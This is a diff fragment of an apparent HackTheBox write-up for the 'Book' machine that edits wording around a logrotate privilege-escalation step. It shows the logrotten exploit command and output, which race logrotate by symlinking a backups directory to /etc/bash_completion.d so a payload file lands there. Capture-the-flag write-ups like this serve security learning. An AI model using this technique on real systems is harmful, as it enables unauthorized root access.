galenlim/hackthebox-htb-writeups/book.md

 Possible reasons:

-* `backups` is not included in `log.cfg`
+* `backups` directory is not included in `log.cfg`
-* The `ifempty` directive active, meaning it will not rotate an empty file.
+* The `ifempty` directive is active, meaning logrotate will not rotate an empty file.

-Assuming second reason is true, let's write something to the log file to trigger a rotate.
+Assuming second reason is true, let's write something to `access.log` to trigger a rotate.

 `echo test > access.log`

-Yes, the rotate was triggered as it did not find an empty file this time.
+Yes, the rotate was triggered as logrotate did not find an empty log file this time.

 ```
-reader@book:/tmp$ ./logrotten -p ./payloadfile -d /home/reader/backups/access.log
+reader@book:/tmp$ ./logrotten -p ./payloadfile /home/reader/backups/access.log
-logfile: /home/reader/backups/access.log
-logpath: /home/reader/backups
-logpath2: /home/reader/backups2
-targetpath: /etc/bash_completion.d/access.log
-targetdir: /etc/bash_completion.d
-p: access.log
 Waiting for rotating /home/reader/backups/access.log...
 Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d
 Waiting 1 seconds before writing payload...